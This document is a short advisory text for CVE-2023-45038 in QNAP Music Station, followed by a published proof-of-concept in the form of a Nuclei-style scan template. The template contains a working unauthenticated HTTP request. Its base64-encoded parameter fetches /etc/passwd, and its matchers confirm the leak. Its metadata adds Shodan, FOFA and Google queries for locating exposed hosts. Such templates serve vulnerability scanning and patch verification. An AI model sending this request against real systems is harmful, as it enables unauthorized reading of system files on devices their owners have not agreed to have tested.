An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later
PoC代码[已公开]
id: CVE-2023-45038
info:
name: QNAP Music Station < 5.4.0 - Authentication Bypass
author: daffainfo
severity: medium
description: |
An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later
reference:
- https://www.qnap.com/en/security-advisory/qsa-24-25
- https://karzemrok.com/qnap-qsa-24-25
- https://nvd.nist.gov/vuln/detail/CVE-2023-45038
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2023-45038
epss-score: 0.06486
epss-percentile: 0.9073
cwe-id: CWE-287
cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: qnap
product: music_station
shodan-query: http.title:"qnap"
fofa-query: title="qnap"
google-query: intitle:"qnap"
tags: cve,cve2023,qnap,music_station,auth-bypass,vkev
http:
- raw:
- |
POST /musicstation/api/as_get_file_api.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ssid=dummy&songid=1&tt=ts&f=L2V0Yy9wYXNzd2Q=
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "admin:.*:0:0:"
- type: word
part: content_disposition
words:
- "filename='passwd'"
- type: status
status:
- 200
# digest: 4b0a00483046022100c958eda877c22358a527406dda8246244bc06c303365ad3058ce054be8d2133a022100e56bee25b026eaf86e42f217875a1336e012ff7a449b9315e7c374fdcff1a66e:922c64590222798bb761d5b6d8e72950